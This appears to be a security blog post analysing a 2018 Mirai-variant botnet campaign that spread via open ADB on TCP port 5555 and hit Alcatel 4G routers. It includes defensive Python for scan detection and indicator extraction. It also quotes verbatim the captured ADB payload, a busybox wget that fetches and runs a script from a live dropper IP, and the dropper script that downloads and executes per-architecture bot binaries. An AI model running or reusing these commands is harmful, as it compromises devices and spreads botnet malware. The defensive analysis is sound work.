Many telecommunication organizations, such as Altice – Portugal and Telekom Security (Telekom system), detected an increase in network traffic directed at ADB shells on the 10th of July at 23:30 UTC.
According to Telekom Security, these attacks were directed at TCP port 5555, and after further analysis, “we saw a big chunk of this traffic coming from China, USA and the Dominican Republic”.
In total we gathered 246.434 packets from 68.361 unique IPs. Based on the packet details we gathered, we can assume that the packets were generated by a lot of different devices. In addition, the traffic behavior on port 5555 matches the typical scan behavior of botnets.
These attacks died out quickly once the download server went offline. Telekom Security reported the abuse to the cloud service provider, temporarily halting infections.
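The "many distinct sources hitting one port in a short window" behavior that Telekom Security describes is what a network defender would look for in flow data. The following is an added example, not code from the Telekom Security or Altice report: it reads constructed NetFlow-style records (private and documentation addresses only, with a burst at 23:30 UTC like the one reported), buckets the connections to TCP/5555 into fixed time windows, and raises an alert when the number of unique source IPs in a window reaches a threshold. The record format, window size and threshold are assumptions chosen for the example.

```python
"""Flag a burst of connection attempts to TCP/5555 (ADB) from many distinct sources.

Added example, not part of the original report. Input is a constructed,
whitespace-separated flow log: "timestamp src_ip dst_ip dst_port proto".
"""
from collections import defaultdict
from datetime import datetime, timedelta

ADB_PORT = 5555
EPOCH = datetime(1970, 1, 1)  # naive UTC origin used for window bucketing

# Constructed sample records (not real traffic). Five distinct sources hit
# port 5555 within one minute starting 23:30:00; later hits are isolated.
SAMPLE_FLOWS = """\
2018-07-10T23:29:50Z 198.51.100.7 10.0.0.5 443 tcp
2018-07-10T23:30:01Z 203.0.113.10 10.0.0.5 5555 tcp
2018-07-10T23:30:02Z 203.0.113.11 10.0.0.5 5555 tcp
2018-07-10T23:30:02Z 203.0.113.12 10.0.0.5 5555 tcp
2018-07-10T23:30:03Z 203.0.113.10 10.0.0.6 5555 tcp
2018-07-10T23:30:04Z 203.0.113.13 10.0.0.5 5555 tcp
2018-07-10T23:30:05Z 203.0.113.14 10.0.0.5 5555 tcp
2018-07-10T23:30:06Z 198.51.100.7 10.0.0.5 22 tcp
2018-07-10T23:31:30Z 203.0.113.15 10.0.0.5 5555 tcp
2018-07-10T23:45:00Z 203.0.113.16 10.0.0.5 5555 tcp
"""


def parse_flows(text):
    """Parse the flow log into (datetime, src, dst, dst_port, proto) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, proto = line.split()
        flows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(port), proto))
    return flows


def unique_sources_per_window(flows, port=ADB_PORT, window=timedelta(minutes=1)):
    """Bucket flows to `port` into fixed windows; return {window_start: set(src_ips)}."""
    buckets = defaultdict(set)
    size = window.total_seconds()
    for ts, src, _dst, dport, proto in flows:
        if proto != "tcp" or dport != port:
            continue
        offset = (ts - EPOCH).total_seconds() % size
        buckets[ts - timedelta(seconds=offset)].add(src)
    return buckets


def detect_scan_burst(flows, port=ADB_PORT, window=timedelta(minutes=1), min_sources=5):
    """Return [(window_start, unique_source_count)] for windows at or above the threshold.

    Counting distinct sources rather than packets is what separates a
    distributed botnet scan from a single noisy host.
    """
    alerts = []
    for start, srcs in sorted(unique_sources_per_window(flows, port, window).items()):
        if len(srcs) >= min_sources:
            alerts.append((start, len(srcs)))
    return alerts


if __name__ == "__main__":
    for start, count in detect_scan_burst(parse_flows(SAMPLE_FLOWS)):
        print(f"ALERT {start.isoformat()}Z: {count} distinct sources -> tcp/{ADB_PORT}")
```

On the sample data only the 23:30 window trips the alert; the threshold of five sources per minute is deliberately tiny for the example and would be set orders of magnitude higher on a real carrier network, where the report counted tens of thousands of unique IPs.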
Inspecting the payload
According to the Telekom report, the payload registered and captured by its T-Pot honeypots (35.204) looks like this:
CNXN 2 host::OPEN ]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget http://95.215.62.169/adbs -O -> adbs; sh adbs; rm adbs
The first bytes of this payload are Android Debug Bridge (ADB) protocol messages (CNXN to connect, OPEN to open a stream to the shell: service), used to initiate a connection to a debug channel. This connection is then used to execute a shell command.
Examining the payload in detail, the following can be concluded.
>/sdcard/Download/f && cd /sdcard/Download/;
A short shell redirection that clears (or creates, like touch) the file /sdcard/Download/f, and then changes to this folder. Because of the &&, the cd only happens if the write succeeded, so this doubles as a check that the directory is writable.
>/dev/f && cd /dev/;
Same as above, just with a different file (and folder).
busybox wget http://95.215.62.169/adbs -O -> adbs; sh adbs; rm adbs
Here the adbs script is downloaded from the dropper server: -O - makes busybox wget write the download to stdout, and the shell splits -> into - followed by the redirection > adbs, so the content lands in the file adbs. Next, it is executed with sh and removed. The rm is used to remove malicious tracks on disk and to keep the malware only in memory.
A parallel search revealed that this IP address had already been detected some time ago in connection with the Satori botnet.
The dropped file analyzed by Telekom Security looks like this:
#!/bin/sh
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
http_server="95.215.62.169"
# for every architecture-specific bot: fetch it from the dropper server, make it executable, run it
for a in $n
do
cp /system/bin/sh $a
>$a
busybox wget http://$http_server/adb/$a -O -> $a
chmod 777 $a
./$a
done
# then remove every downloaded binary from disk
for a in $n
do
rm $a
done
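When a honeypot captures a payload like the one above, the analyst's first job is to pull the indicators out of it without running anything. The following is an added example, not code from the Telekom Security or Altice report: it extracts the shell command carried in the ADB OPEN shell: service string, lists the download URLs, recognizes the fetch-execute-remove chain (wget -O - > F; sh F; rm F) and the writable-directory probes, and expands the simple variable scheme of the dropper script to enumerate the per-architecture binaries it would request. The sample strings are constructed from the payload and script shown in the report and are handled purely as data; the regexes and the tiny $var expansion are assumptions that cover this script's syntax only, not a shell interpreter.

```python
"""Triage of a captured ADB payload and of the dropper script it fetches.

Added example, not part of the original report. All inputs are constructed
strings treated as data; nothing here downloads or executes anything.
"""
import re

# Constructed from the payload shown in the report.
SAMPLE_PAYLOAD = (
    "CNXN 2 host::OPEN ]+shell:>/sdcard/Download/f && cd /sdcard/Download/; "
    ">/dev/f && cd /dev/; busybox wget http://95.215.62.169/adbs -O -> adbs; "
    "sh adbs; rm adbs"
)

# Constructed from the dropper script shown in the report.
SAMPLE_DROPPER = """#!/bin/sh
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
http_server="95.215.62.169"
for a in $n
do
cp /system/bin/sh $a
>$a
busybox wget http://$http_server/adb/$a -O -> $a
chmod 777 $a
./$a
done
for a in $n
do
rm $a
done
"""

URL_RE = re.compile(r"https?://[^\s;'\"]+")
# wget URL -O - > FILE; sh FILE; rm FILE   (the shell reads "->" as "-" then ">")
FETCH_EXEC_RM_RE = re.compile(
    r"wget\s+(?P<url>https?://\S+)\s+-O\s+-\s*>\s*(?P<file>\S+);\s*sh\s+(?P=file);\s*rm\s+(?P=file)"
)
# ">/path/file && cd /path/;" : write probe followed by a cd into the same place
WRITE_PROBE_RE = re.compile(r">(/\S+)\s*&&\s*cd\s+(\S+?);")
ASSIGN_RE = re.compile(r'^(\w+)="?([^"\n]*)"?$', re.M)  # name="value" lines
VAR_RE = re.compile(r"\$\{?(\w+)\}?")                  # $name or ${name}


def shell_command_from_adb_payload(payload):
    """Return the shell command carried after the ADB 'shell:' service marker, or None."""
    marker = "shell:"
    idx = payload.find(marker)
    if idx < 0:
        return None
    return payload[idx + len(marker):].strip()


def triage_payload(payload):
    """Extract URLs, the fetch/execute/remove chain and write probes from a payload."""
    cmd = shell_command_from_adb_payload(payload)
    if cmd is None:
        return {"adb_shell": False}
    chain = FETCH_EXEC_RM_RE.search(cmd)
    return {
        "adb_shell": True,
        "urls": URL_RE.findall(cmd),
        "fetch_exec_rm": chain is not None,
        "dropped_file": chain.group("file") if chain else None,
        "writable_probes": WRITE_PROBE_RE.findall(cmd),
    }


def expand_dropper_urls(script):
    """Enumerate the URLs a dropper of this shape would request.

    Supports only straight name="value" assignments and 'for VAR in $LIST'
    loops, which is all this script uses; anything else is left unexpanded.
    """
    variables = dict(ASSIGN_RE.findall(script))
    loops = dict(re.findall(r"for\s+(\w+)\s+in\s+\$(\w+)", script))  # loop var -> list var
    urls = []
    for template in re.findall(r"wget\s+(https?://\S+)", script):
        loop_vars = [v for v in VAR_RE.findall(template) if v in loops]
        bindings = [{}]
        for lv in loop_vars:  # cartesian product over the word list of each loop variable
            words = variables.get(loops[lv], "").split()
            bindings = [dict(b, **{lv: w}) for b in bindings for w in words]
        for binding in bindings:
            env = dict(variables, **binding)
            urls.append(VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), template))
    return urls


if __name__ == "__main__":
    print(triage_payload(SAMPLE_PAYLOAD))
    for url in expand_dropper_urls(SAMPLE_DROPPER):
        print("would fetch:", url)
```

The output gives a blocklist-ready set of indicators (the dropper host, the adbs script URL and the seven per-architecture binary URLs) and two behavioral signatures worth alerting on in honeypot and EDR telemetry: a write-then-cd probe against /sdcard/Download and /dev, and the download-run-delete chain that leaves nothing on disk.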
The binaries were submitted to VirusTotal; it is fairly certain they are a variant of Mirai.
Altice – Portugal also detected this attack on its infrastructure, namely on Alcatel 4G MW40V routers.
We have detected anomalous behaviors in our mobile network on July 10, specifically affecting this model of routers. After a detailed investigation by our teams, Alcatel was informed of all the details of our investigation.
According to Altice, “the in-depth analysis of the data provided by Altice Portugal to Alcatel’s engineering development team enabled the detection of a security vulnerability in the firmware of this model, which allows remote installation in the device memory of a malware through ADB commands to the TCP port 5555 which is open by default on these devices”.
During the firmware code analysis the researchers noticed that the malware only runs while the device stays up; it does not survive a power cycle. After a shutdown or restart the device is safe and clean until it is infected again.
According to Alcatel, this is a “zero day” vulnerability affecting only this specific model of Alcatel routers.
Alcatel has published new firmware versions that are automatically installed on the devices.